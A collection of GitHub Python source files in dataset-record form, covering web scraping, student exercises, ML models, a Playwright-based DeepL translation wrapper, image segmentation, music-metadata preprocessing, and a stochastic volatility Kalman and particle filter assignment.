available_instore, rating, num_reviews])\n\n\n\n\nfinally:\n\tdriver.quit()\n\tdf = pd.DataFrame(file)\n\tdf.to_csv(\"Walmart_Lounge_and_Co.csv\", index=False)","repo_name":"Isaac-Muscat/Programming-Experience-and-Resources","sub_path":"WebScrapingProjects/Web_Scraping_Walmart/WS_Selenium.py","file_name":"WS_Selenium.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"19337460883","text":"#Altere o programa anterior, intercalando 3 vetores de 10 elementos cada.\n\nvetorA = []\nvetorB = []\nvetorC = []\nvetorD = []\nprint('Vetor A')\nfor a in range(10):\n vetorA.append(int(input(f'Vetor A | {a+1}º número: ')))\nprint('*' * 28)\nprint('Vetor B')\nfor b in range(10):\n vetorB.append(int(input(f'Vetor B | {b+1}º número: ')))\nprint('*' * 28)\nprint('Vetor C')\nfor c in range(10):\n vetorC.append(int(input(f'Vetor C | {c+1}º número: ')))\nfor d in range(10):\n vetorD.append(vetorA[d])\n vetorD.append(vetorB[d])\n vetorD.append(vetorC[d])\nprint('Vetor A -->', end=' ')\nfor i, a in enumerate(vetorA):\n if i < len(vetorA) - 1:\n print(f'{a} |', end=' ')\n else:\n print(a)\nprint('Vetor B -->', end=' ')\nfor i, b in enumerate(vetorB):\n if i < len(vetorB) - 1:\n print(f'{b} |', end=' ')\n else:\n print(b)\nprint('Vetor C -->', end=' ')\nfor i, c in enumerate(vetorC):\n if i < len(vetorC) - 1:\n print(f'{c} |', end=' ')\n else:\n print(c)\nprint('Vetor D -->', end=' ')\nfor i, d in enumerate(vetorD):\n if i < len(vetorD) - 1:\n print(f'{d} |', end=' ')\n else:\n print(d)\n\n","repo_name":"prmmendes/Python-Exercicios","sub_path":"4.11_listas.py","file_name":"4.11_listas.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30021382298","text":"from . import model\nfrom sklearn.feature_selection import RFE\nfrom ufc_predictor import util\n\n\nclass LogisticRegressionModel(model.ModelInterface):\n def __init__(self, clf):\n self.clf = clf\n self.fit_support = None\n\n def fit(self, X, y):\n # Use Recursive Feature Elimation for feature selection\n rfe = RFE(self.clf)\n fit = rfe.fit(X, y)\n self.fit_support = fit.support_\n # filter to only the significant variables\n X = X[:, fit.support_]\n X = util.add_bias(X)\n self.clf.fit(X, y)\n\n def predict(self, future_X):\n return self.clf.predict(future_X).tolist()\n","repo_name":"natebuel29/ufc-event-predictor","sub_path":"ufc_predictor/models/log_reg_model.py","file_name":"log_reg_model.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"408780753","text":"import re\nimport time\nimport math\nfrom datetime import datetime\nfrom threading import Thread\n\n\ncs_str = \"\"\"Thermo Scientific (c) 2011\n Versa Star Pro \nMeter S/N V14888\nSW Rev 11.30\nChannel 1\nProbe S/n XT3-11311\nModule S/n VA21265\nMethod 100\nCalibration Time 28-04-21,14:06\nUser ID LABUSER\n-- pH Calibration Report --\nPoint 1\npH 1.68\nmV 292.3\nTemperature 24.7 C (ATC)\nCalibration Type Manual\nPoint 2\npH 4.01\nmV 141.8\nTemperature 24.7 C (ATC)\nCalibration Type Auto\nPoint 3\npH 7.00\nmV -14.5\nTemperature 24.7 C (ATC)\nCalibration Type Auto\n\"\"\"\n\nnow = datetime.now()\nstart = time.perf_counter()\n\n\ndef manipulate_str(cs_str):\n\tstr = re.split(\" |\\n\", cs_str)\n\n\tnow = datetime.now()\n\tfile = open(f\"test-{now.strftime('%d-%m-%Y@%H-%M')}.txt\", \"a+\")\n\tfor i in cs_str:\n\t\tif bool(re.search(r'\\d', i)):\n\t\t\tfile.write(f\"{i}\\n\")\n\tfile.close()\n\n\ndef factorial(num_range):\n\tprint([*num_range])\n\tfact = 1\n\tfor i in num_range:\n\t\tfact *= i\n\n\t# fact = 1\n\t# for i in range(1, num+1):\n\t# \tfact *= i\n\treturn fact\n\n\t# print(f\"Factorial of {num} is {fact}\")\n\t# math.factorial(num)\n\n\nnum = -1\nwhile num < 1:\n\ttry:\n\t\tnum = int(input(\"Enter Positive Integer Number to Find Factorial: \"))\n\texcept ValueError:\n\t\tpass\n\n\nth = len(str(num))\nthread_slices = [range(1, num+1)[i::th] for i in range(th)]\nprint(thread_slices)\n\nthreads = []\nfactoid = 1\n\nfor each in thread_slices:\n\tt = Thread(target=factorial, args=[each], )\n\tt.start()\n\t# factoid *= t\n\t# print(dir(t))\n\tthreads.append(t)\n\n\n\nfor thread in threads:\n\tthread.join()\n\tprint(thread.daemon)\n\n\nprint(factoid)\n\n# f = Thread(target=factorial, args=[num]) # args=[i]\nm = Thread(target=manipulate_str, args=[cs_str])\n\n# f.start()\n# m.start()\n\n# f.join()\n# m.join()\n\n# factorial(i)\n\n# manipulate_str(str)\n\nfinish = time.perf_counter()\n\nprint(f\"Time Elapsed - {round(finish-start, 2)} seconds\")","repo_name":"Not-Qualified/python","sub_path":"conc.py","file_name":"conc.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19636820123","text":"import prime\nfrom itertools import count\n\nupto = 2000000\n\ndef gsum():\n s = 0\n g = prime.primes()\n for x in count():\n p = g.next()\n if p > upto:\n break\n s += g.next()\n return s\n\ndef ssum():\n p = prime.sieve(upto)\n return sum(p)\n","repo_name":"karolciba/playground","sub_path":"projecteuler/problem_10_primes_sum.py","file_name":"problem_10_primes_sum.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1200227338","text":"\"\"\"\nObjective\nToday we're expanding our knowledge of Strings and combining it with what we've already learned about loops. Check out the Tutorial tab for learning materials and an instructional video!\n\nTask\nGiven a string, , of length that is indexed from to , print its even-indexed and odd-indexed characters as space-separated strings on a single line (see the Sample below for more detail).\n\"\"\"\n\nif __name__ == \"__main__\":\n n = int(input())\n for i in range(0, n):\n string = str(input())\n string_list = list(string)\n evens = []\n odds = []\n for index, letter in enumerate(string_list):\n if index % 2 == 0:\n evens.append(letter)\n else:\n odds.append(letter)\n string_evens = ''.join(evens)\n string_odds = ''.join(odds)\n print('{} {}'.format(string_evens, string_odds))\n","repo_name":"brendanreardon/hackerrank","sub_path":"tutorials/30 days of code/06-review.py","file_name":"06-review.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33956212083","text":"from sklearn import datasets\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\niris = datasets.load_iris()\n\nx = iris.data\ny = iris.target\n\nmodel = Sequential()\nmodel.add(Dense(8, input_dim=4, activation='relu'))\nmodel.add(Dense(8, activation='relu'))\nmodel.add(Dense(8, activation='relu'))\nmodel.add(Dense(1, activation='sigmoid'))\n\nmodel.compile(loss='binary_crossentropy',\n\t\t\t optimizer='adam', metrics=['accuracy'])\nmodel.fit(x, y, batch_size=15, epochs=150)\nscores = model.evaluate(x, y)\n\npredictions = model.predict(x)\n\nrounded = [round(x[0]) for x in predictions]\ncount = 0\nfor i in range(len(predictions)):\n\tif(y[i] != predictions[i]):\n\t\tcount = count + 1\nprint('Number of wrong answers : {}'.format(count))\n","repo_name":"ayush1999/Keras-API","sub_path":"iris.py","file_name":"iris.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70407675245","text":"import asyncio\nfrom typing import Any\nimport textwrap\n\nfrom install_playwright import install\nfrom playwright._impl._api_types import Error as PlaywrightError\nfrom playwright.async_api import async_playwright\nfrom .errors import DeepLError, DeepLPageError\n\nclass DeepL:\n fr_langs = {\n \"auto\",\n \"bg\",\n \"cs\",\n \"da\",\n \"de\",\n \"el\",\n \"en\",\n \"es\",\n \"et\",\n \"fi\",\n \"fr\",\n \"hu\",\n \"id\",\n \"it\",\n \"ja\",\n \"ko\",\n \"lt\",\n \"lv\",\n \"nl\",\n \"pl\",\n \"pt\",\n \"ro\",\n \"ru\",\n \"sk\",\n \"sl\",\n \"sv\",\n \"tr\",\n \"uk\",\n \"zh\",\n }\n to_langs = fr_langs - {'auto'}\n\n def __init__(self, fr_lang: str, to_lang: str, timeout: int = 15000) -> None:\n if fr_lang not in self.fr_langs:\n raise DeepLError(f\"{repr(fr_lang)} is not valid language. Valid language:\\n\" + repr(self.fr_langs))\n if to_lang not in self.to_langs:\n raise DeepLError(f\"{repr(to_lang)} is not valid language. Valid language:\\n\" + repr(self.to_langs))\n \n self.fr_lang = fr_lang\n self.to_lang = to_lang\n self.translated_fr_lang: str | None = None\n self.translated_to_lang: str | None = None\n self.max_lenght = 3000\n self.timeout = timeout\n self.common_text = \"\" \n\n async def __async_generator_split(self, string: str) -> str | None:\n buffer = textwrap.wrap(string, width=self.max_lenght, break_long_words=False)\n for line in buffer:\n yield line\n\n async def translate(self, string: str) -> str | None:\n return await self.__translate(string)\n \n async def install_browser(self) -> bool:\n async with async_playwright() as p:\n code = await asyncio.get_event_loop().run_in_executor(None, install, p.chromium)\n if code:\n return True\n else:\n return False\n \n async def check_browser_install(self) -> bool:\n async with async_playwright() as p:\n try:\n await self.__get_browser(p)\n except PlaywrightError as e:\n if \"Executable doesn't exist at\" in e.message:\n return False\n else:\n return True\n\n async def __translate(self, string: str) -> Any:\n async with async_playwright() as p: \n browser = await self.__get_browser(p)\n\n page = await browser.new_page()\n page.set_default_timeout(self.timeout)\n\n excluded_resources = [\"image\", \"media\", \"font\", \"other\"]\n await page.route(\n \"**/*\",\n lambda route: route.abort() if route.request.resource_type in excluded_resources else route.continue_(),\n )\n\n async for line in self.__async_generator_split(string=string):\n url = \"https://www.deepl.com/en/translator\"\n try:\n await page.goto(f\"{url}#{self.fr_lang}/{self.to_lang}/{line}\")\n page.get_by_role(\"main\")\n except PlaywrightError as e:\n msg = f\"Maybe Time limit exceeded. ({self.timeout} ms)\"\n raise DeepLPageError(msg) from e\n\n try:\n await page.wait_for_function(\n \"\"\"\n () => document.querySelector(\n 'd-textarea[data-testid=translator-target-input]')?.value?.length > 0\n \"\"\",\n )\n except PlaywrightError as e:\n msg = f\"Time limit exceeded. ({self.timeout} ms)\"\n raise DeepLPageError(msg) from e\n \n input_textbox = page.get_by_role(\"region\", name=\"Source text\").locator(\"d-textarea\")\n output_textbox = page.get_by_role(\"region\", name=\"Translation results\").locator(\"d-textarea\")\n\n self.translated_fr_lang = str(await input_textbox.get_attribute(\"lang\")).split(\"-\")[0]\n self.translated_to_lang = str(await output_textbox.get_attribute(\"lang\")).split(\"-\")[0]\n\n res = str((await output_textbox.all_inner_texts())[0])\n res = res.replace(\"\\n\\n\", \"\\n\")\n\n self.common_text += f\"{res}\\n\"\n\n await browser.close()\n\n return self.common_text\n \n async def __get_browser(self, p: Any) -> Any:\n return await p.chromium.launch(\n headless=True,\n args=[\n \"--no-sandbox\",\n \"--single-process\",\n \"--disable-dev-shm-usage\",\n \"--disable-gpu\",\n \"--no-zygote\",\n ],\n )","repo_name":"Anton1802/TkDeepL","sub_path":"src/modules/deepl.py","file_name":"deepl.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"9399586584","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport time\nfrom skimage import exposure\nimport scipy.misc\nfrom setup import *\nfrom matching import segment_modules\n\n\n\n# read raw video data\n# input: raw video name with full path\ndef read_raw_video(raw_name):\n raw_size = os.path.getsize(raw_name)\n img_num = raw_size / (rows*cols*2) # 4 (32 bits) or 2 (16 bits)\n num = int(img_num)\n \n raw = open(raw_name, 'rb')\n f = np.fromfile(raw, dtype=np.uint16, count=rows*cols*num) # rows*cols*(offset+num)\n # normalize the intensities to be in [0,255]\n f = 255.*(f - f.min())/(f.max()-f.min())\n fm = [] \n for i in range(0,num):\n start = rows*cols*i\n end = rows*cols*(i+1)\n img = f[start:end].reshape(rows,cols)\n \n # contrast stretching\n p2, p98 = np.percentile(img, (2, 98))\n img = exposure.rescale_intensity(img, in_range=(p2, p98))\n \n fm1 =format(1000*compute_quality(img), '.5f')\n fm.append(str(i)+' '+fm1)\n \n segment(img, )\n \n #scipy.misc.imsave(raw_dir+str(i)+'.jpg', img) # save to jpg file \n \n # show the quality factor on the images\n #font = cv2.FONT_HERSHEY_SIMPLEX\n #cv2.putText(img, text, (0, 25),\n # cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255, 255, 255), 1)\n #cv2.imshow('Image', img)\n #cv2.waitKey(100)\n \n # save the quality factors of the images to a file\n with open(work_dir+os.path.basename(raw_name).split('.')[0]+'_quality.txt', 'w') as f:\n for s in fm:\n print(s, file=f)\n\n\n# segment all single modules \ndef segment_modules(img_dir, image_indices):\n for i in image_indices:\n img = cv2.imread(img_dir+str(i)+'.jpg', 0)\n save_path = raw_img_module+str(i)+'_'\n\ndef segment(img): #,save_path):\n gray = cv2.GaussianBlur(img,(3,3),0) \n thresh, result = cv2.threshold(gray,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n \n kernel = np.ones((11,11),np.uint8)\n open = cv2.morphologyEx(result,cv2.MORPH_OPEN,kernel)\n \n # detect connected components\n cc = cv2.connectedComponentsWithStats(open,8,cv2.CV_32S)\n \n stats = cc[2]\n ind = np.argsort(stats[:,-1]) # indices of all connected components\n max_components = []\n min_val = stats[ind[-2],-1]/1.8 # exclude background\n mod_num = 1 # number of modues inside the image\n\n for i in reversed(range(ind.size-1)):\n # check if touching the boarder: test left, right, up and down, and also min area\n if (stats[ind[i],0] != 0 and stats[ind[i],-1] >= min_val and \n (stats[ind[i],0]+stats[ind[i],2]) != img.shape[1] and\n (stats[ind[i],1] != 0) and\n (stats[ind[i],1]+stats[ind[i],3]) != img.shape[0]):\n #max_components.append((cc[1]==ind[i])*img)\n #cv2.imwrite(save_path+str(mod_num)+'.jpg', (cc[1]==ind[i])*img)\n mod_num += 1 \n\n\n# tracking all \ndef template_matching(template, img):\n h,w = template.shape\n res= cv2.matchTemplate(img, template, cv2.TM_CCORR_NORMED)\n \n # matching for only one object\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n #top_left = max_loc\n #bottom_right = (top_left[0] + w, top_left[1] + h)\n #cv2.rectangle(img,top_left, bottom_right, 255, 2)\n #print(res.max())\n #print(top_left)\n \n plt.subplot(121),plt.imshow(res,cmap = 'gray')\n plt.title('Matching Result'), plt.xticks([]), plt.yticks([])\n plt.subplot(122),plt.imshow(img,cmap = 'gray')\n plt.title('Detected Point'), plt.xticks([]), plt.yticks([])\n #plt.show()\n \n return round(max_val,4)\n\n\n# transform all the single module images \n# TODO: add the case for only illustration - no need to perform transformation\ndef perspective_all(dir_module, only_for_center):\n # for all the modules iamges, compute the perspective transform\n for filename in sorted(os.listdir(dir_module), key=lambda x: (int(x.split('_')[0]), int(x.split('.')[0].split('_')[1]))):\n video = video_process(dir_module+filename)\n video.segment(video.origin_img)\n \n corners = video.houghLine(video.module_thresh)\n video.perspective(video.origin_img, corners, dims)\n #cv2.imwrite(match_persp+os.path.splitext(filename)[0] + '.jpg', video.persp_img)\n \n # save the centroids of these modules for later use, i.e. \n # illustration of modules @show_modules\n # and also acting as a reference point for transformation\n center = video.center_of_module\n n1, _ = filename.split('_')\n\n if n1 in centers:\n centers[n1].append(center)\n else:\n centers[n1] = [center]\n \n \n # save the perspectively transformed images as a whole image, not just a single module \n img = np.zeros_like(video.origin_img)\n x0, y0 = img.shape\n x1, y1 = video.persp_img.shape\n \n # Get the left and upper corner of the module in the transformed image by\n # checking if touching left, upper, right, down\n top_left = [max(center[0]-x1/2., 0), max(center[1]-y1/2., 0)]\n top_left = [min(top_left[0], x0-1-x1), min(top_left[1], y0-1-y1)]\n top_left = np.array(top_left).astype(int)\n \n img[top_left[0]:top_left[0]+x1, top_left[1]:top_left[1]+y1] = video.persp_img.copy() \n \n cv2.imwrite(match_persp_full + os.path.splitext(filename)[0] + '.jpg', img)\n\n# find out the images that correspond to the same module with very high probability, e.g. 0.8\ndef classfy_modules(save_with_prob):\n # performing classification for the modules\n dir_to_match = match_persp_full\n img_names = sorted(os.listdir(dir_to_match), key=lambda x: int(x.split('_')[0]))\n ref_img = img_names[0]\n ref_name = os.path.splitext(ref_img)[0] # with extension - '.jpg'\n if save_with_prob == True: # for later consistency\n ref_name = '('+ref_name+', 1.0)' \n\n results = {1:[ref_name]} # default: for template\n template = cv2.imread(dir_to_match+ref_img,0)\n \n for filename in img_names:\n img = cv2.imread(dir_to_match+filename,0)\n #img = cv2.equalizeHist(img)\n val = os.path.splitext(filename)[0]\n best_match = 0.\n best_key = 0\n for key in results:\n #template = cv2.imread(dir_to_match+results[key][0]+'.jpg', 0) # not so good\n if save_with_prob == True:\n temp_name = results[key][-1].split(',')[0].split('(')[1] # if with prob\n else:\n temp_name = results[key][-1] # default: without prob \n template = cv2.imread(dir_to_match+temp_name+'.jpg', 0) # much better\n\n res = template_matching(template, img)\n #print(res)\n if res > best_match:\n best_match = res\n best_key = key\n \n if best_match > 0.8:\n if save_with_prob == True:\n val = '('+val+', '+str(best_match)+')' # with probabilities\n results[best_key].append(val)\n else: \n if save_with_prob == True:\n val = '('+val+', '+str(best_match)+')' # with probabilities \n results[len(results)+1] = [val] \n \n return results \n","repo_name":"faujpli/zae_test","sub_path":"src/all_process.py","file_name":"all_process.py","file_ext":"py","file_size_in_byte":7305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38576362231","text":"from typing import Generator\n\nimport pandas as pd\nfrom pandas import DataFrame\nfrom tqdm import tqdm\n\nfrom consts.data_consts import SPOTIFY_ID, ID\nfrom consts.language_consts import LANGUAGE, SCORE\nfrom consts.path_consts import SHAZAM_TRACKS_IDS_PATH, SHAZAM_TRACKS_LANGUAGES_PATH, MUSIXMATCH_TRACKS_LANGUAGES_PATH, \\\n LANGUAGES_ABBREVIATIONS_MAPPING_PATH\nfrom consts.shazam_consts import SHAZAM_TRACK_KEY, APPLE_MUSIC_ADAM_ID\nfrom data_processing.pre_processors.language.language_record import LanguageRecord\nfrom data_processing.pre_processors.pre_processor_interface import IPreProcessor\nfrom utils.file_utils import read_json\n\nSHAZAM_KEY = 'shazam_key'\nSHAZAM_ADAMID = 'shazam_adamid'\nMUSIXMATCH_LANGUAGE = 'musixmatch_language'\nMUSIXMATCH_SCORE = 'musixmatch_score'\nRAW_LANGUAGE_COLUMN_NAMES = [\n LANGUAGE,\n SCORE,\n MUSIXMATCH_LANGUAGE,\n MUSIXMATCH_SCORE\n]\n\n\nclass LanguagePreProcessor(IPreProcessor):\n def __init__(self):\n self._languages_abbreviations_mapping = read_json(LANGUAGES_ABBREVIATIONS_MAPPING_PATH)\n\n def pre_process(self, data: DataFrame) -> DataFrame:\n data_with_shazam_ids = self._merge_shazam_tracks_ids_data(data)\n data_with_shazam_language = self._merge_lyrics_languages_data(data_with_shazam_ids)\n data_with_musixmatch_language = self._merge_musixmatch_language_data(data_with_shazam_language)\n language_data = self._create_data_with_single_language_column(data_with_musixmatch_language)\n language_data[LANGUAGE] = language_data[LANGUAGE].map(self._languages_abbreviations_mapping)\n\n return language_data\n\n @staticmethod\n def _merge_shazam_tracks_ids_data(data: DataFrame) -> DataFrame:\n shazam_tracks_ids_data = pd.read_csv(SHAZAM_TRACKS_IDS_PATH)\n shazam_tracks_ids_relevant_data = shazam_tracks_ids_data[[SHAZAM_TRACK_KEY, APPLE_MUSIC_ADAM_ID, SPOTIFY_ID]]\n shazam_tracks_ids_relevant_data.columns = [SHAZAM_KEY, SHAZAM_ADAMID, ID]\n shazam_tracks_ids_relevant_data.drop_duplicates(subset=ID, inplace=True)\n\n return data.merge(\n right=shazam_tracks_ids_relevant_data,\n how='left',\n on=[ID]\n )\n\n @staticmethod\n def _merge_lyrics_languages_data(data_with_shazam_ids: DataFrame) -> DataFrame:\n lyrics_data = pd.read_csv(SHAZAM_TRACKS_LANGUAGES_PATH)\n lyrics_data.rename(columns={SHAZAM_TRACK_KEY: SHAZAM_KEY}, inplace=True)\n lyrics_data.drop_duplicates(subset=SHAZAM_KEY, inplace=True)\n\n return data_with_shazam_ids.merge(\n right=lyrics_data,\n how='left',\n on=[SHAZAM_KEY]\n )\n\n @staticmethod\n def _merge_musixmatch_language_data(data_with_shazam_language: DataFrame) -> DataFrame:\n musixmatch_data = pd.read_csv(MUSIXMATCH_TRACKS_LANGUAGES_PATH)\n musixmatch_data.dropna(inplace=True)\n musixmatch_data.rename(columns={LANGUAGE: MUSIXMATCH_LANGUAGE, SCORE: MUSIXMATCH_SCORE}, inplace=True)\n musixmatch_data.drop_duplicates(subset=ID, inplace=True)\n\n return data_with_shazam_language.merge(\n right=musixmatch_data,\n how='left',\n on=[ID]\n )\n\n def _create_data_with_single_language_column(self, data: DataFrame) -> DataFrame:\n unique_songs_data = data.drop_duplicates(subset=ID)\n language_records = [record.to_dict() for record in self._generate_language_data_records(unique_songs_data)]\n language_data = pd.DataFrame.from_records(language_records)\n relevant_data = data.drop(RAW_LANGUAGE_COLUMN_NAMES, axis=1)\n\n return relevant_data.merge(\n right=language_data,\n how='left',\n on=[ID]\n )\n\n @staticmethod\n def _generate_language_data_records(data: DataFrame) -> Generator[LanguageRecord, None, None]:\n print('Starting to select final language from different sources')\n\n with tqdm(total=len(data)) as progress_bar:\n for i, row in data.iterrows():\n if not pd.isna(row[LANGUAGE]):\n yield LanguageRecord(\n id=row[ID],\n language=row[LANGUAGE],\n score=row[SCORE],\n lyrics_source='shazam'\n )\n\n elif not pd.isna(row[MUSIXMATCH_LANGUAGE]):\n yield LanguageRecord(\n id=row[ID],\n language=row[MUSIXMATCH_LANGUAGE],\n score=row[MUSIXMATCH_SCORE],\n lyrics_source='musixmatch'\n )\n\n progress_bar.update(1)\n\n @property\n def name(self) -> str:\n return 'language pre processor'\n","repo_name":"nirgodin/RadioStations","sub_path":"data_processing/pre_processors/language/language_pre_processor.py","file_name":"language_pre_processor.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"11654863923","text":"\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport statsmodels.tsa.stattools as st\nfrom statsmodels.tsa.stattools import acf, pacf\nimport seaborn as sns\nfrom scipy.stats import norm\nfrom scipy.special import ndtri\nfrom scipy import optimize\n\n#a)/b)\nexchange = pd.read_excel(\"/Users/stephanweenk/Downloads/VU Amsterdam/Econometrie/Time Series Models/Syllabus, exercises, assignments/Assignment 2/SvData.xlsx\", delimiter = ';')\nexchange = exchange/100\nx = np.log((exchange-np.mean(exchange))**2)\nTime = len(x)\nY = x.values\n\nexchange_dem = exchange-np.mean(exchange)\n\n# State smoother\ndef state_smoother_SV(a, P, v, F, y, T, Z, K):\n n = len(y)\n # vectors to be filled\n Alpha_hat = np.zeros(n) # smoothed state\n L = np.zeros(n)\n r = np.zeros(n + 1) # state smoothing cumulant\n N = np.zeros(n + 1) # State variance cumulant\n V = np.zeros(n) # smoothed state variance\n\n for t in range(0, n):\n if not np.isnan(y[t]):\n L[t] = T - K[t] * Z\n else:\n L[t] = 1\n\n # Reverse recursion for cumulants\n for t in range(n - 1, -1, -1):\n if not np.isnan(y[t]):\n r[t] = Z * v[t] / (F[t]) + L[t] * r[t + 1]\n N[t] = Z ** 2 / F[t] + (L[t] ** 2) * N[t + 1]\n else:\n r[t] = r[t + 1]\n N[t] = (1 / F[t]) + (L[t] ** 2) * N[t + 1]\n\n # variance and state smoothing\n for t in range(0, n):\n V[t] = P[t] - (P[t] ** 2) * N[t]\n Alpha_hat[t] = a[t] + P[t] * r[t]\n\n return Alpha_hat, V, r, N, L\n\n\n# =============================================================================\n# Plot raw data\nplt.figure(1, figsize=(15,4))\nplt.plot(np.arange(len(exchange)), exchange_dem/100, linewidth=0.75, color = 'grey')\nplt.hlines(y=0, xmin=0, xmax=len(exchange), linewidth=1)\nplt.show()\n\n# Plot transformed data to make the SV model linear\nplt.figure(1, figsize=(15,4))\nplt.scatter(np.arange(len(x)), x, s = 4, color = 'black')\n#plt.hlines(y=0, xmin=0, xmax=len(x), linewidth=1)\nplt.show()\n\nlog_ret_df = pd.DataFrame(exchange)\nstats = log_ret_df.describe()\nstats.loc[8] = log_ret_df.median()\nstats.loc[9] = log_ret_df.skew()\nstats.loc[10]= log_ret_df.kurtosis()\nstats.rename(index={8: 'median',9: 'skewness',10: 'kurtosis'})\n\n\n# c)\n# Kalman filter\ndef Kalman_Filter_SV(y, H, Q, phi, R, Z, a_1, P_1, d, omega): ### Note that time is len(x)\n # Construct vectors\n n = len(x)\n a = np.zeros(n)\n a[0] = a_1\n P = np.zeros(n)\n P[0] = P_1\n v = np.zeros(n)\n F = np.zeros(n)\n K = np.zeros(n)\n\n # Compute the values\n for i in range(0, n - 1):\n if not np.isnan(y[i]):\n v[i] = y[i] - Z * a[i] - d ### allow for intercept\n if isinstance(H, float):\n F[i] = Z * P[i] * Z + H\n else:\n F[i] = Z * P[i] * Z + H\n K[i] = phi * P[i] * Z * (1 / F[i])\n a[i + 1] = omega + phi * a[i] + K[i] * v[i]\n P[i + 1] = phi * P[i] * phi + R * Q * R - K[i] * F[i] * K[i]\n else:\n v[i] = np.nan\n F[i] = 10 ** 9\n K[i] = 0\n a[i + 1] = a[i]\n P[i + 1] = P[i] + Q\n\n v[-1] = y[len(y) - 1] - Z * a[-1]\n F[-1] = P[-1] + H\n return a, P, v, F, K\n\n\ndef loglik_SV(theta, y):\n # Construct known and theta\n H = np.pi ** 2 / 2\n Z = 1\n d = -1.27\n omega = theta[0] ### c\n phi = theta[1] ### T\n R = 1\n Q = theta[2]### sigma_etasquared\n a_1 = np.mean(y)\n P_1 = Q / (1 - phi ** 2)\n\n a, P, v, F, K = Kalman_Filter_SV(y, H, Q, phi, R, Z, a_1, P_1, d, omega)\n l = (-1 / 2) * np.log(2 * np.pi) - (1 / 2) * np.log(F) - (1 / 2) * np.square(v) / F\n llik = np.mean(l)\n\n return -llik\n\n\n# QML SV model\noptions = {'eps': 1e-07, # argument convergence criteria\n 'disp': True, # display iterations\n 'maxiter': 5000} # maximum number of iterations\nML_SV = optimize.minimize(loglik_SV, np.array([0.001, 0.9, 0.5]), args=(Y), method='SLSQP', options=options)\nprint(ML_SV)\n\nH = np.pi ** 2 / 2\nZ = 1\nd = -1.27\nomega = ML_SV.x[0] ### c\nphi = ML_SV.x[1] ### T\nR = 1\nQ = ML_SV.x[2]### sigma_etasquared\na_1 = np.mean(Y)\nP_1 = Q / (1 - phi ** 2)\n\na, P, v, F, K = Kalman_Filter_SV(Y, H, Q, phi, R, Z, a_1, P_1, d, omega)\n\nAlpha_hat, V, r, N, L = state_smoother_SV(a, P, v, F, Y, phi, Z, K)\n\n# d)\n### Figures\nplt.figure(1, figsize=(15,4))\nplt.plot(Alpha_hat[1:], color='black', label='$h_{t}$ smoothed')\nplt.plot(a[1:], color='red', label='$h_{t}$')\nplt.scatter(range(len(Y) - 1), Y[1:], s=2, color = 'black')\nplt.legend()\n\nksi = omega / (1 - phi)\nH_vec_smoothed = Alpha_hat - ksi\nH_vec = a - ksi\n\nplt.figure(1, figsize=(15,4))\nplt.plot(H_vec_smoothed, color='black', label='$H_{t}$ smoothed')\nplt.plot(H_vec, color='red', label='$H_{t}$')\nplt.legend()\n\n#f)\nraw_data= exchange.values\n\ndef particle_filter(y, phi, Q, N, ksi):\n T= len(y)\n theta_tilde = np.zeros((N,T))\n sigma = np.zeros(N)\n w_tilde = np.zeros(N)\n w_norm = np.zeros(N)\n H_estimate = np.zeros(T)\n mu = np.mean(y)\n\n\n\n # Now we obtain all the theta tildes\n theta_tilde[:, 0] = np.random.normal(loc=0,\n scale=np.sqrt(Q / (1 - phi ** 2)), size=N)\n # and the unconditional sigma\n sigma[:] = np.exp((1/2)*(theta_tilde[:, 0]+ksi))\n # obtain w tilde\n #w_tilde[:] = (1/(sigma[:]*np.sqrt(2*np.pi)))*np.exp((-(y[0]-mu)**2)/(2*sigma[:]**2)) #### Include pdf function of normal with differing loc and scale\n w_tilde[:] = norm.pdf(y[0], loc = mu, scale = sigma[:])\n # then we normalize the weights\n\n w_norm[:] = w_tilde[:] / np.sum(w_tilde[:])\n\n # then we compute a hat, which is an estimate of H in the case of our SV model\n H_estimate[0] = np.sum(w_norm[:] * theta_tilde[:, 0])\n theta_tilde[:, 0] = np.random.choice(theta_tilde[:, 0], p=w_norm[:])\n\n\n\n for j in range(1, T):\n # Now we obtain all the theta tildes\n theta_tilde[:, j] = np.random.normal(loc=phi * theta_tilde[:, j - 1], scale=np.sqrt(Q), size=N)\n # and the unconditional sigma\n sigma[:] = np.exp((1/2)*(theta_tilde[:, 0]+ksi))\n # obtain w tilde\n #w_tilde[:] = (1/(sigma[:]*np.sqrt(2*np.pi)))*np.exp((-(y[j]-mu)**2)/(2*sigma[:]**2))\n w_tilde[:] = norm.pdf(y[j], loc = mu, scale = sigma[:])\n # then we normalize the weights\n w_norm[:] = w_tilde[:] / np.sum([w_tilde[:]])\n # then we compute a hat, which is an estimate of H in the case of our SV model\n H_estimate[j] = np.sum(w_norm[:] * theta_tilde[:, j])\n # and we resample the theta for the next period\n theta_tilde[:, j] = np.random.choice(theta_tilde[:, j], p=w_norm[:], replace = True)\n\n return 